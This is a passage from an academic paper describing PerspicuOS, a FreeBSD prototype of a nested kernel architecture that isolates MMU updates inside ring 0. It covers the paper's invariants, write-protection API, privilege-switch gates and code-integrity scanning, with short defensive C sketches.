To demonstrate the benefit of the write-mediation and write-logging facilities—for enhancing commodity OS security—we present three intra-kernel write-protection policies and applications. First, we introduce the write-once mediation policy that only allows a single update to protected data structures, and apply it to protect the system call vector table, defending against kernel call hooking [27]. In general, the write-once policy presents a novel defense against non-control data attacks [11]. Second, we introduce the append-only mediation policy that only allows append operations to list type data structures, and apply it to protect data generated by a system call logging facility. Additionally, the system call logging facility guarantees invocation of monitored events, a feature made possible by PerspicuOS’s code integrity property, and therefore supports a pivotal feature required by a large class of security monitors. Third, we deploy a write-logging policy to track modifications to FreeBSD’s process list data structures, allowing our system to detect direct kernel object manipulation (DKOM) attacks used by rootkits to hide malicious processes [27]. We have retrofitted the nested kernel architecture into an existing commodity OS: the FreeBSD 9.0 kernel. Our experimental evaluation shows that this reorganization requires approximately 2000 lines of FreeBSD code modifications while significantly reducing the TCB of memory isolation code to less than 5000 lines of nested kernel code. Our prototype also demonstrates that it is feasible to completely remove MMU modifying instructions from the untrusted portion of the kernel while allowing it to operate in ring 0. Furthermore, our experiments show that the nested kernel architecture incurs very low overheads for relatively OS-intensive system benchmarks: < 1% for Apache and 2.7% for a full kernel compile. 
In summary, the key contributions of this paper include:

- A new OS organization strategy, the nested kernel architecture, which nests, within a monolithic kernel, a higher privilege protection domain that enables kernel developers to explicitly apply intra-kernel security policies through the use of write-mediation and write-logging services.
- A novel x86-64 implementation of the nested kernel architecture, PerspicuOS, that virtualizes supervisor privilege, thereby keeping the outer kernel and the nested kernel at the highest protection level; PerspicuOS uses only the MMU and control registers to protect memory, in lieu of VMM extensions, expensive page table manipulation, or costly compiler techniques.
- An evaluation of three intra-kernel memory access control policies: a write-once policy to protect access to the system call table, a write-logging policy that detects rootkits attempting to hide processes, and an append-only system call logging facility with incorruptible logs and guaranteed invocation.
- An OS design that provides lifetime kernel code integrity, defending against a large class of kernel malware.

2. Nested Kernel Approach

The primary insight and contribution of the nested kernel architecture is to demonstrate how to virtualize a minimal subset of hardware functionality, specifically the MMU, to guarantee mediation and therefore isolation of intra-kernel protection domains. By virtualizing the MMU, the nested kernel architecture enables a new set of protection policies based upon physical page resources and their mappings within the kernel. This section presents the nested kernel architecture overview, our foundational design principles, and the challenges of virtualizing the MMU; it concludes with a description of the nested kernel write protection service made available to kernel developers.
2.1 System Overview

The nested kernel architecture partitions and reorganizes a monolithic kernel into two privilege domains: the nested kernel and the outer kernel. The nested kernel is a subset of the kernel’s code and data that has full system privilege, and most importantly, the nested kernel has sole privilege to modify the underlying physical MMU (pMMU) state. The nested kernel mediates outer kernel modifications to the MMU via a virtual interface, which we refer to as the virtual MMU (vMMU). The outer kernel is then modified to use the vMMU. Similar to previous work [15, 43], the nested kernel architecture isolates pMMU updates at the final stage of creating a virtual to physical translation: the point at which a virtual-to-physical translation is made active on the processor (i.e., when the processor can use the translation). For example, on the x86-64, address mappings are added to the system by storing a value to a virtual memory location, called a page-table entry (PTE), that resides on a page-table page (PTP) [2]. By selecting this abstraction, the outer kernel still manages all aspects of the virtual memory subsystem; however, the nested kernel interposes on all pMMU updates, thereby allowing the nested kernel to isolate the pMMU and enforce any other access control policy in the system, such as the one used to protect nested kernel code and data.

2.2 Design Principles

The nested kernel architecture comprises the mechanism and interface to establish virtual address mappings. As such, we seek to accomplish the following:

Separate resource control (e.g., policy) from protection mechanism (e.g., MMU). We seek the lowest level of abstraction possible to virtualize the MMU, providing only a mechanism that performs updates to virtual-to-physical address mappings.
This principle has several benefits: it minimizes the TCB of the privileged domain, maximizes the portability of the nested kernel, and gives maximum flexibility to the types of policies implemented in the outer kernel while maintaining isolation of the nested kernel.

Operating system co-design and explicit interface. OS designers are experts in how their systems work: they represent the best opportunity to enhance the security of the system. Therefore, the nested kernel architecture presents a unified design to realize protections explicitly within the OS rather than transparently enforcing protections via external tools, as in the case of prior work [35, 43, 44].

Privilege separation based upon MMU state, not instructions. Traditionally, systems use the notion of rings of protection, where each ring prescribes what instructions may be executed by code in that ring. In contrast, we enforce privilege separation in terms of access to the pMMU, including both memory (e.g., PTPs) and CPU state (e.g., the WP-bit in CR0).

Minimal architecture dependence. We want to make the nested kernel architecture as hardware agnostic as possible, assuming only a hardware paging mechanism with page-granularity protections and the ability to enforce write-protections on outer kernel code.

Fine-grained resource control. The protections enabled by virtualizing the MMU can be expressed in many ways; we seek to enable fine-grained resource control, i.e., protections at byte-level granularity, so that intra-kernel isolation policies can be applied to arbitrary OS data structures.

Negligible performance impact. The nested kernel architecture provides isolation and privilege separation without requiring separate address spaces, so that it can be applied to operating system architectures with minimal overhead.
In our x86-64 prototype, we also run both the outer kernel and nested kernel in the same protection ring (ring 0) rather than via hardware virtualization extensions to avoid costly hypercalls, as evidenced by measurements in Section 5.3.

2.3 Virtualizing the MMU via API Emulation

We summarize the runtime isolation of the pMMU as the following property, which Invariants 1 and 2 enforce:

**Nested Kernel Property.** The nested kernel interposes on all modifications of the pMMU via the vMMU.

**Invariant 1.** Active virtual-to-physical mappings for protected data are configured read-only while the outer kernel executes.

**Invariant 2.** Write-protection permissions in active virtual-to-physical mappings are enforced while the outer kernel executes.

Active virtual-to-physical mappings are those mappings that may be used by the processor to determine page protections; inactive mappings do not affect memory access privileges. Invariant 2 applies to those processors (such as the x86 [2]) which can disable page protections while still performing virtual-to-physical address translation. While these definitions are independent of whether the MMU uses hardware- or software-managed TLBs, we will assume a hardware-managed TLB to simplify discussion. On a hardware-TLB system, the nested kernel architecture enforces Invariant 1 by 1) requiring explicit initialization of PTPs, 2) creating an explicit interface to update the page-table entries (PTEs), and 3) configuring all PTEs that map PTPs as read-only. Therefore, any PTP that has not been explicitly initialized at boot time by the nested kernel or declared by the outer kernel via the vMMU is rejected from use, enforcing Invariant 1. Invariant 2 can be enforced by a variety of mechanisms, including internal page protection mechanisms such as used in our prototype or external mechanisms such as a virtual machine monitor running at a higher hardware privilege level.
Section 3.2 details how we ensure Invariant 2 is enforced in PerspicuOS on the x86-64 architecture. 2.4 Intra-Kernel Memory Write Protection Services By isolating the pMMU from the outer kernel, the nested kernel can fully enforce memory access control policies on any physical page in the system. For example, the nested kernel can write-protect all statically defined constant data or a subset of system call function pointers that never change at runtime. Therefore, the nested kernel architecture provides a simple, robust API for specifying and enforcing such policies on kernel memory. The write-protection services API, listed in Table 1, comprises memory allocation and a data write function with an accompanying byte-granularity mediation policy. Clients use the intra-kernel protection services to allocate regions of memory that are protected by and only written from nested kernel code. When an allocation is requested, either statically via \texttt{nk\_declare} or dynamically via \texttt{nk\_alloc}, the nested kernel initializes a write descriptor and allocates an associated memory region. The nested kernel also establishes the memory bounds for the region and sets the mediation callback function (as defined below) that implements the write-protection policy. The nested kernel returns to the client both the write descriptor and virtual address of the newly allocated write-protected region, and finally, write-protects all existing mappings to the physical pages containing the memory region. Clients specify write-protection policies in the form of mediation functions. Mediation functions enforce the update policies for write-protected kernel objects, and are invoked by the nested kernel prior to any writes. One example of a simple mediation function is a no-write policy for constant data, whose function body, \texttt{return false;}, rejects all writes to the memory region.
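As a concrete illustration, the write-descriptor bookkeeping and the no-write mediation function described above might be sketched in C as follows. This is a user-space sketch only: the struct layout, function signatures, and return conventions are our own illustration (not PerspicuOS code), and the final `memcpy` stands in for the privileged copy the nested kernel performs with write protection disabled.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Illustrative write descriptor: the bounds of a protected region plus
 * the mediation callback that decides whether a given write is allowed. */
typedef bool (*mediate_fn)(void *dest, const void *src, size_t len);

typedef struct nk_wd {
    char      *base;      /* start of the protected region */
    size_t     size;      /* region length in bytes */
    mediate_fn mediate;   /* policy callback; NULL = permit all writes */
} nk_wd;

/* No-write policy for constant data: reject every update. */
static bool no_write(void *dest, const void *src, size_t len) {
    (void)dest; (void)src; (void)len;
    return false;
}

/* Mediated write: bounds check first, then consult the policy.
 * Argument order follows the nk_write row of Table 1. */
static int nk_write(void *dest, const void *src, size_t len, nk_wd *wd) {
    char *d = dest;
    if (d < wd->base || d + len > wd->base + wd->size)
        return -1;                  /* outside the protected region */
    if (wd->mediate && !wd->mediate(dest, src, len))
        return -1;                  /* policy rejected the write */
    memcpy(dest, src, len);         /* in PerspicuOS, this copy runs in
                                       the nested kernel with WP cleared */
    return 0;
}
```

A write through a descriptor with the `no_write` policy always fails, while an unmediated descriptor permits in-bounds writes only.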
A more complex example is a write-once policy, such as described in Section 4.1.1 where the nested kernel initializes a bitmap for each byte in the allocated memory region, then upon an \texttt{nk\_write}, validates that the write is only made to memory not previously written. A significant value of the write-protection interface is that even in the absence of a mediation function (e.g., all writes to the object are permitted), the updates must use \texttt{nk\_write}, thus thwarting overwrites from memory corruption bugs. Once a write descriptor, \texttt{nk\_wd}, is created, the outer kernel executes mediated writes via the \texttt{nk\_write} function. \texttt{nk\_write} operates similarly to a simple byte-level memory copy operation. \texttt{nk\_write} performs two checks prior to executing the write: 1) it verifies that the write is within the boundary of the region specified by \texttt{nk\_wd}, and 2) it invokes the mediation function, if any. By allowing clients to write only a subset of the memory region, the nested kernel allows protection of aggregate data types without requiring any knowledge about its fields. The interface also makes bounds checking fast by including the write descriptor for constant-time lookup of the descriptor information for the given region. To fully support dynamically allocated memory, the nested kernel provides \texttt{nk\_free}, which deallocates memory previously allocated by \texttt{nk\_alloc}. Because an OS exploit could prematurely force \texttt{nk\_free} to be called on a memory region and then attempt to store to it, any freed memory must be retained in protected memory, and so we design a simple interface that assumes the allocator is part of the nested kernel. 2.5 Preventing DMA Memory Writes The nested kernel must also prevent DMA writes to protected memory. We require that the system have an IOMMU [1] that the nested kernel can use to ensure that DMA operations do not modify any pages protected by the nested kernel. 3. 
PerspicuOS: A Nested Kernel Prototype We present a concrete implementation of the nested kernel architecture, named PerspicuOS, for x86-64 processors. PerspicuOS introduces a novel method for ensuring privilege separation between the outer kernel and the nested kernel while running both at the highest hardware privilege level, effectively creating two virtual privilege levels in ring 0. PerspicuOS achieves this goal by taking advantage of x86-64 hardware support for efficiently enabling and disabling MMU write protection enforcement and by controlling which privileged instructions can be used by outer kernel code. More specifically, PerspicuOS applies the design presented in Section 2.5 by configuring all mappings to PTPs as read-only and de-privileging the outer kernel so that it cannot disable write-protection enforcement at ring 0. PerspicuOS de-privileges the outer kernel by scanning all outer kernel code to ensure that it does not contain instructions that disable the WP-bit or the MMU. Additional hardware features (described in Section 3.5) prevent user-space code or kernel data from being used to disable protections. In this section, we describe our threat model, specify a set of invariants to maintain the Nested Kernel Property, and then discuss how PerspicuOS maintains the invariants through a combination of virtual privilege switch management, MMU configuration validation, and lifetime kernel code integrity. 3.1 Threat Model and Assumptions In this work, we assume that the outer kernel may be under complete control of the attacker who can attempt to arbitrarily modify CPU state. Furthermore, we assume that an attacker can modify outer kernel source code, i.e., that outer kernel code may be malicious. Moreover, we do not assume or require outer kernel control flow integrity, which means that an attacker can arbitrarily target any memory location on the system for execution. 
For example, since nested kernel and outer kernel code may reside in a unified address space, an attacker could attempt to redirect execution to arbitrary locations within nested kernel code, including instructions that toggle write-protections (i.e., the nested kernel must take explicit steps to prevent such control transfers or render them harmless). We assume that the nested kernel source code and binaries are trusted and that the nested kernel is loaded with a secure boot mechanism such as in AEGIS [45] or UEFI [48]. We also trust mediation functions, a necessary requirement to ensure security checks execute in PerspicuOS. We assume that the nested kernel and mediation functions are free of vulnerabilities, and given the small source code size (less than 5,000 lines-of-code), the nested kernel could be formally or manually verified. Furthermore, we assume that the hardware is free of vulnerabilities and do not protect against hardware attacks. 3.2 Protection Properties and Invariants The nested kernel design specifies two invariants that must hold to enforce the Nested Kernel Property. Invariant 1 requires that all active mappings to PTPs be configured as read-only; Invariant 2 requires that these configurations be enforced while the outer kernel is in operation. We systematically assessed the x86-64 architecture specification [2] to identify both the necessary hardware configurations to realize invariants 1 and 2 and the hardware configurations that may violate those invariants. For example, write-protections are enforced on supervisor-mode accesses when both the WP-bit is set and the mapping is configured as read-only; however, alternative execution modes, such as System Management Mode (SMM), can bypass write-protections when invoked. From this assessment, we derive the following invariants that ensure that invariants 1 and 2 hold. 
3.2.1 Supporting Invariant 1 The set of active mappings in x86-64 is controlled by the CR3 register and a set of in-memory PTPs [2]. CR3 specifies the base address of a “top-level” page serving as the root for a hierarchical translation data structure that is traversed by the MMU [2]. To ensure that all translations to protected physical pages are marked as read-only (thereby ensuring Invariant 1), PerspicuOS enforces the following invariants: Invariant 3. Ensure that there are no unvalidated mappings prior to outer kernel execution. Invariant 4. Only declared PTPs are used in mappings. Invariant 5. All mappings to PTPs are marked read-only. Invariant 6. CR3 is only loaded with a pre-declared top-level PTP.
<table>
<thead>
<tr> <th>Function</th> <th>Selected Arguments</th> <th>Purpose</th> </tr>
</thead>
<tbody>
<tr> <td>nk_declare</td> <td>mem_start, size, mediation_func</td> <td>Marks all pages RO; initializes an NK write descriptor nk_wd; returns the nk_wd and the pointer to the region.</td> </tr>
<tr> <td>nk_alloc</td> <td>size, mediation_func, nk_wd_p</td> <td>Allocates memory region; invokes nk_declare on it; stores write descriptor in nk_wd; returns nk_wd and pointer to the region.</td> </tr>
<tr> <td>nk_free</td> <td>nk_wd</td> <td>Deallocates memory region identified by nk_wd. Memory must have been allocated by nk_alloc. Freed pages can be reused only by a future nk_alloc.</td> </tr>
<tr> <td>nk_write</td> <td>dest, src, size, nk_wd</td> <td>Writes size bytes from src to dest; dest must lie within the region identified by nk_wd; the region’s mediation function is invoked prior to the write.</td> </tr>
</tbody>
</table>
Table 1. Nested Kernel Write Protection API. nk_declare is for static allocation and nk_alloc is for dynamic allocation. 3.2.2 Supporting Invariant 2 PerspicuOS must ensure that, while the outer kernel is operating, MMU write-protections are continually enforced.
Read-only permissions are enforced by x86-64 when the processor is operating in long mode with write-protections enabled, i.e., the Protected Mode Enable (PE), Paging Enable (PG), and Write-Protect Enable (WP) bits are set in CR0; the Physical Address Extensions (PAE) bit is set in CR4; and the Long Mode Enable (LME) bit is set in the EFER model specific register (MSR) [2]. Therefore, PerspicuOS considers scenarios where the outer kernel attempts to 1) disable the WP-bit while in operation, 2) disable paging by modifying the PG-bit, or 3) subvert control flow of the nested kernel so that the outer kernel gains control of execution while the WP-bit has been legitimately disabled for nested kernel operations. PerspicuOS ensures that the WP-bit is always set while the outer kernel is in operation and that any instantaneous mode changes that could disable paging, such as an SMM interrupt, are directed to nested kernel control. Invariants 7 and 8 capture the requirements on the WP-bit. Invariant 7. The WP and PG flags in CR0 are set prior to any outer kernel execution. Invariant 8. The WP-bit in CR0 is never disabled by outer kernel code. When the PG-bit is disabled, the processor immediately interprets virtual addresses as physical addresses [2]. As Section 3.7 describes, preventing the outer kernel from clearing the PG-bit is impossible. Instead, PerspicuOS enforces the following invariant: Invariant 9. Disabling the PG-bit directs control flow to the nested kernel. Additionally, SMM may be invoked by the outer kernel; therefore, PerspicuOS must also assert control over the SMI interrupt. Invariant 10. The nested kernel controls the SMM interrupt handler and operation. Given that the previous set of invariants hold, the outer kernel might attempt to manipulate CPU state or outer kernel memory in such a way as to cause control flow to move from nested kernel code to outer kernel code without re-enabling the WP-bit.
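The long-mode configuration that enforces read-only mappings can be captured as a small predicate. The flag names and bit positions below follow the x86 architecture manuals; the function itself is only an illustrative check, not PerspicuOS code.

```c
#include <stdbool.h>
#include <stdint.h>

/* x86-64 control-register flags relevant to Invariants 7 and 8
 * (bit positions per the Intel/AMD architecture manuals). */
#define CR0_PE   (1u << 0)       /* Protected Mode Enable */
#define CR0_WP   (1u << 16)      /* Write Protect (supervisor accesses) */
#define CR0_PG   (1u << 31)      /* Paging */
#define CR4_PAE  (1u << 5)       /* Physical Address Extensions */
#define EFER_LME (1ull << 8)     /* Long Mode Enable */

/* True iff a (cr0, cr4, efer) triple describes a mode in which
 * read-only mappings are enforced against supervisor-mode writes. */
static bool wp_enforced(uint32_t cr0, uint32_t cr4, uint64_t efer) {
    return (cr0 & CR0_PE) && (cr0 & CR0_PG) && (cr0 & CR0_WP)
        && (cr4 & CR4_PAE) && (efer & EFER_LME);
}
```

Clearing any single flag, e.g., the WP-bit, makes the predicate false, which is exactly the state the outer kernel must never reach.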
Therefore, to ensure write-protections are always enforced, PerspicuOS must protect against control-flow attacks on nested kernel execution in two specific cases: interrupt control flow paths and nested kernel stack state manipulation. PerspicuOS ensures that all exit paths from the nested kernel to the outer kernel enable the WP-bit (shown in Figure 3), which is captured in the following invariant: Invariant 11. Enable the WP-bit on interrupts and traps prior to calling outer kernel interrupt/trap handlers. Because the trap handlers are a part of the nested kernel, the Interrupt Descriptor Table (IDT) [2] must be placed in protected memory and modifications of the Interrupt Descriptor Table Register (IDTR) must be solely a nested kernel operation. Invariant 12. The IDT must be write-protected, and the IDTR is only updated by the nested kernel. On a multiprocessor system, code running in outer kernel context on one core could modify the return address stored on the stack by code running in the nested kernel on another core if the stack is in outer kernel memory. This would cause nested kernel code to return to outer kernel context without enabling the WP-bit. Therefore, PerspicuOS must ensure that code running in the nested kernel uses its own stack located in nested kernel memory. Invariant 13. The nested kernel stack is write-protected from outer kernel modifications. 3.3 System Initialization PerspicuOS must ensure that all mappings to protected pages (e.g., PTPs, code, nested kernel data, etc.) are configured as read-only and that paging is enabled prior to outer kernel execution, as suggested by Invariants 2 and 7.
Therefore, PerspicuOS, as depicted in Figure 1, initializes the paging system so that Invariants 3—where validation implies Invariants 4, 5, and 6 by registering all protected pages in nested kernel data structures—and 7 are enforced prior to outer kernel execution by using secure boot and “nested kernel init” functionality, thereby initializing all PTEs in the system. 3.4 Virtual MMU Interface PerspicuOS provides a set of functions, called the nested kernel operations, that allow the outer kernel to configure the pMMU. The nested kernel operations interpose on underlying x86-64 instructions, called protected instructions, to isolate the pMMU. There are two classes of nested kernel operations: those that control the configuration of the hardware PTPs via memory writes and those that control updates to processor control registers. The nested kernel enforces pMMU update policies by assigning types to physical pages based upon the kind of data stored in each physical page. The page types include PTPs, nested kernel code and data, outer kernel code and data, user code and data, and data protected by the intra-kernel write-protection service. This type information, along with the number of active mappings and a list of all virtual address mappings to the page, is kept in a physical page descriptor. The outer kernel uses the nk_declare_PTP operation to specify the physical pages to be used as PTPs. The nk_declare_PTP operation takes, as arguments, the level within the page table hierarchy at which the physical page will be used and the address of the physical page being declared, then zeros the page to eliminate any stale data, write-protects all existing virtual mappings to the physical page, and registers the physical page as a PTP by updating the page’s physical page descriptor. Once declared, a physical page cannot be modified directly by outer kernel code.
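The declaration step just described can be sketched as follows. The page-descriptor layout and the simulated physical memory are illustrative stand-ins for PerspicuOS’s internal data structures; the write-protection of existing mappings is noted but not modeled here.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define PAGE_SIZE 4096

/* Illustrative physical page types and descriptor (the real descriptor
 * also tracks the active-mapping count and a list of virtual mappings). */
enum pg_type { PG_DATA, PG_PTP, PG_NK, PG_KERNEL_CODE, PG_USER };

struct pg_desc {
    enum pg_type type;
    unsigned     level;    /* page-table level, if type == PG_PTP */
};

/* Simulated physical memory: frame number -> descriptor + contents. */
#define NFRAMES 8
static struct pg_desc descs[NFRAMES];
static uint8_t        frames[NFRAMES][PAGE_SIZE];

/* Declare a physical frame as a page-table page: zero it to remove
 * stale entries, record its level, and mark it as a PTP.  In
 * PerspicuOS this step also write-protects all existing mappings
 * to the frame.  Redeclaration is rejected. */
static bool nk_declare_PTP(unsigned frame, unsigned level) {
    if (frame >= NFRAMES || descs[frame].type == PG_PTP)
        return false;                    /* unknown frame, or already a PTP */
    memset(frames[frame], 0, PAGE_SIZE); /* eliminate stale data */
    descs[frame].type  = PG_PTP;
    descs[frame].level = level;
    return true;
}
```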
Instead, the outer kernel uses the nk_write_PTE operation, which inspects and validates all mappings prior to insertion. The nested kernel uses the previously described physical page type information along with a list of existing mappings to each page to ensure that 1) if the PTE does not point to a data page then it targets a declared PTP and 2) all mappings to PTPs are write-protected, thereby ensuring Invariants 4 and 5 respectively. The nested kernel also protects nested kernel code, data, and stack pages to avoid code modifications that would eliminate mediation or functionality of the pMMU update process. We also ensure that the update does not write to any kernel data protected by the nested kernel; this is done via a simple check that ensures that the physical page being updated was previously declared as a page table page. The second group of operations configure the paging hardware itself. We expose an interface for updating CR3 to ensure that it only points to a declared top-level PTP, called the PML4-PTP, thereby ensuring Invariant 6. The interface for modifying other registers ensures that paging and lifetime kernel code integrity protections are not disabled by outer kernel code. Descriptions of these mechanisms are given in Sections 3.5 and 3.7. 3.5 Lifetime Kernel Code Integrity To prevent protected instructions from being executed while in outer kernel context, PerspicuOS first validates all code before making it executable in supervisor-mode, and second, protects the runtime integrity of validated code by enforcing lifetime kernel code integrity, thereby maintaining Invariants 6 and 8. PerspicuOS enforces load time outer kernel code validity by scanning binary code to ensure that it does not contain any protected instructions, including at unaligned instruction boundaries.
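A minimal version of such an offline scan might look like the following. The opcode table is deliberately tiny and illustrative; a real de-privileging scanner must handle the full x86-64 encoding space (prefixes, register operands, and every protected instruction), and it must check every byte offset because x86 permits jumping into the middle of an instruction.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Offline de-privileging scan (sketch): reject kernel code that
 * contains a protected-instruction encoding at ANY byte offset. */
static bool is_protected_opcode(const uint8_t *p, size_t remaining) {
    if (remaining < 2 || p[0] != 0x0f)
        return false;
    switch (p[1]) {
    case 0x22: return true;   /* mov %reg, %crN (covers CR0/CR3/CR4) */
    case 0x30: return true;   /* wrmsr */
    default:   return false;
    }
}

static bool code_is_deprivileged(const uint8_t *code, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (is_protected_opcode(code + i, len - i))
            return false;     /* protected instruction found */
    return true;
}
```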
Then PerspicuOS enforces dynamic lifetime outer kernel code integrity by configuring the processor and pMMU so that, by default, all kernel pages are mapped as non-executable (enforced by the no-execute bit). ### Table 2. Nested Kernel Operations, Protected Instructions, Description, and Constraints
<table>
<thead>
<tr> <th>Operation</th> <th>x86 Instruction</th> <th>Description</th> <th>Constraints</th> </tr>
</thead>
<tbody>
<tr> <td>nk_declare_PTP</td> <td>None</td> <td>Initialize physical page descriptor as usable in page tables</td> <td></td> </tr>
<tr> <td>nk_write_PTE</td> <td>mov VAL, PTEADDR</td> <td>Update pMMU mapping</td> <td></td> </tr>
<tr> <td>nk_remove_PTP</td> <td>mov VAL, PTEADDR</td> <td>Remove physical page from being used as PTP</td> <td></td> </tr>
<tr> <td>nk_load_CR0</td> <td>mov %REG, %CR0</td> <td>Controls enforcement of read-only mappings</td> <td></td> </tr>
<tr> <td>nk_load_CR3</td> <td>mov %REG, %CR3</td> <td>Controls MMU mapping base PML4 page</td> <td></td> </tr>
<tr> <td>nk_load_CR4</td> <td>mov %REG, %CR4</td> <td>Controls user mode execution with SMEP flag</td> <td></td> </tr>
<tr> <td>nk_load_MSR</td> <td>wrmsr Value, MSR</td> <td>Controls enforcement of no-execute permissions</td> <td></td> </tr>
</tbody>
</table>
![Figure 2. Nested Kernel Entry.](image2) ![Figure 3. Nested Kernel Exit.](image3) 3.6 Virtual Privilege Switches In PerspicuOS, the nested kernel and outer kernel share a single address space. Therefore, nested kernel operations are essentially function calls to nested kernel functions that are wrapped by entry and exit gates that (among other things) disable and enable the WP-bit. Virtual privilege switches occur when write-protection is disabled (which only occurs on nested kernel operations).
In this section, we detail PerspicuOS entry and exit gates and describe the ways in which PerspicuOS ensures that the outer kernel does not gain control while write protections are disabled (enforcing I11 and I13) and how the gates ensure that mediation functions execute (ensuring I4 and I5). 3.6.1 Nested Kernel Entry and Exit Gates The nested kernel entry and exit gates ensure that there is a clear and protected privilege boundary between the nested kernel and the outer kernel. The routines depicted in Figures 2 and 3 perform the virtual privilege switch. The entry gate (Figure 2) disables interrupts, turns off system-wide write protections, disables interrupts, and then switches to a secure nested kernel stack; the exit gate (Figure 3) executes the reverse sequence. PerspicuOS by default disables interrupts while in operation; however, we include the second interrupt disable instruction to avoid instances where the outer kernel invokes interrupts that may corrupt internal nested kernel state. 3.6.2 Interrupts PerspicuOS disables interrupts when executing in the nested kernel. Because the nested kernel is limited to a very small set of functionality, disabling interrupts is not expected to impact performance. Disabling interrupts simplifies the design of nested kernel operations because they can execute atomically: they do not need to contend with the possibility of being interrupted. However, long-running mediation functions may need to run with interrupts enabled—we leave supporting this feature as future work. PerspicuOS must also ensure that the WP-bit is set whenever either a trap occurs or if the outer kernel directly invokes the WP-bit disable instruction and subsequently manages to execute an interrupt prior to the second interrupt disable instruction. This is necessary because an attacker could feed inputs to a mediated function that causes it to generate a trap; if the handler runs in the outer kernel, it would be running with write-protection disabled. 
PerspicuOS protects against these attacks by isolating the x86-64 interrupt handler table (enforcing Invariant 12) and configuring it to send all interrupts and traps through the nested kernel trap gate first, as depicted in Figure 1. The nested kernel trap gate sets the WP-bit before transferring control to an outer kernel trap handler, following a loop similar to the exit gate's, starting at assembly label “l” in Figure 3, thus enforcing Invariant 11. 3.6.3 Nested Kernel Stack To enforce Invariant 13, PerspicuOS includes separate stacks for the nested kernel. Upon entry to the nested kernel, PerspicuOS saves the existing outer kernel stack pointer and switches to a preallocated nested kernel stack, as shown in Figure 2. When exiting the nested kernel, PerspicuOS restores the original outer kernel stack pointer (Figure 3). 3.6.4 Ensuring Write Mediation By mapping the nested kernel code into the same address space as the outer kernel, PerspicuOS gains in efficiency on privilege switches; however, the outer kernel can directly jump to instructions that modify the protected state. For example, the outer kernel can target the instruction that writes to PTP entries, thus bypassing the vMMU mediation. However, such a write will fail with a protection trap because the jump would have bypassed the entry gate, which is the only way to turn off the system-wide write protections enforced by the WP-bit (Figure 2). In this way, PerspicuOS ensures that either mediation will occur or the system will detect a write violation. 3.7 Privileged Register Integrity While the protections in Section 3.5 prevent the outer kernel from directly modifying privileged registers (e.g., CR0, CR3, IDTR), it is possible for the outer kernel to jump to instructions within the nested kernel that configure these registers. To protect against this, the nested kernel unmaps pages containing these instructions from the virtual address space when the outer kernel is executing and maps them only when needed.
Invariant 6 (protecting CR3) and Invariant 12 (protecting the IDTR) are enforced using this method because direct modification of these registers can allow the outer kernel to instantly gain control. While this works for most privileged registers, it does not work for CR0 to enforce Invariant 8 because the entry and exit gates must toggle write protections, and therefore the instructions that write CR0 must be mapped into the same address space as the outer kernel. Therefore, the outer kernel could load a value into the RAX register and jump to the instruction in the entry and exit gates that moves RAX into CR0. Ideally, the entry and exit gates would use bit-wise OR and AND instructions with immediate operands to set and clear the WP-bit in CR0. Unfortunately, the x86-64 lacks such instructions; it can only copy a value in a general purpose register into a control register. Note that the protected instruction “mov %REG, %CR0” is only mapped at three code locations: the entry, exit, and trap gates. Entry gates do not require verification of the value loaded into CR0 because the purpose of the entry gate is to disable the WP-bit; in contrast, exit and trap gates return control flow to the outer kernel after modifying CR0. The exit and trap gates must therefore ensure that the WP-bit is enabled. To do so, PerspicuOS inserts a simple check and loop in the exit gate to ensure that the value of RAX has the WP-bit enabled, thus ensuring Invariant 8. Since these are the only instances of writes to CR0 in the code, PerspicuOS ensures that outer kernel attacks cannot bypass write-protections by using these instructions. In the x86-64 architecture, paging is enabled when the processor is in either protected mode with paging enabled (both PG-bit and PE-bit set) or long mode (PG, PE, PAE, and LME bits set).
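The check-and-loop guarding the CR0 load can be modeled in C as follows. In PerspicuOS this is a few assembly instructions in the exit gate; here `simulated_cr0` stands in for the actual control register, and the loop shape mirrors the gate's compare-and-retry over RAX.

```c
#include <stdint.h>

#define CR0_WP (1u << 16)   /* Write Protect bit in CR0 */

static uint32_t simulated_cr0;

/* Exit-gate sketch: never load CR0 with the WP-bit clear.  Even an
 * attacker who jumps here with a crafted RAX value ends up re-enabling
 * write protection before control returns to the outer kernel. */
static void exit_gate_load_cr0(uint32_t rax) {
    while (!(rax & CR0_WP))   /* check-and-loop from the exit gate */
        rax |= CR0_WP;        /* force write protection on */
    simulated_cr0 = rax;      /* stands in for: mov %rax, %cr0 */
}
```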
To handle the situation where the outer kernel disables the PG-bit (regardless of whether the CPU is in long or protected mode), PerspicuOS configures the MMU so that the virtual address of the entry gate matches a physical address containing code that traps into the nested kernel, thereby enforcing Invariant 9 whenever the PG-bit is disabled. If either the PAE-bit or LME-bit is disabled while the CPU is in long mode, a general protection fault occurs. Because the bits are not updated but instead a trap occurs, the write-protections continue to be enabled and do not require any other solution. According to the Intel Architecture Reference Manual, the PE-bit cannot be disabled unless the PG-bit is also disabled \cite{51}, which is handled by the previously described solution.
### 3.8 Allocating Protected Data Structures
PerspicuOS presents the intra-kernel write-protection interface as described in Section 2.4 for allocating and updating write-protected data structures. PerspicuOS establishes a predefined ELF memory region to protect global statically-defined data structures. Kernel developers declare write-protected data structures with a C macro that uses a special compiler directive to notify the linker to allocate the object into the specified region. The macro then registers the object into the write descriptor table along with the precomputed bounds and generates both the nk_wd and pointer to the region. PerspicuOS provides for dynamic allocation via the interface as described in Section 2.4. The shadow process list example uses this interface, which is described in Section 4.1.3. One of the primary challenges of implementing the nested kernel write protection services is to devise a method for conquering the protection granularity gap \cite{51}, specifically the issue of protecting data co-located on pages with non-protected data.
The nested kernel interface can fully support in-place protections but would result in poor performance: each unprotected object would require a trap and emulate cycle. Therefore, we modify the linker script to put this protected ELF region onto its own set of separate pages so that only write-protected data is placed in the region. At boot time, pages belonging to this protected ELF section are write-protected via MMU configuration to ensure the Nested Kernel Property for each of these data structures. ### 3.9 Mediation Functions In an ideal nested kernel implementation, mediation functions would not be in the TCB. This would keep the TCB small regardless of the number of policies and would allow policies to be mutually distrusting. However, to simplify implementation, and to ensure that the mediation functions are executed prior to writes, mediation functions are incorporated into PerspicuOS’s TCB. In our evaluation of the write protection interface, we present a set of predefined trusted mediation functions (which, like the mediation functions in an ideal design, do not write to nested kernel memory). ### 3.10 Implementation We implemented PerspicuOS in FreeBSD 9.0. We replaced all instances of writes to PTPs to use the appropriate nested kernel API function and inserted validation checks as Section 3.4 describes. We modified the trap handlers to check for and enable the WP-bit; however, we did not implement the 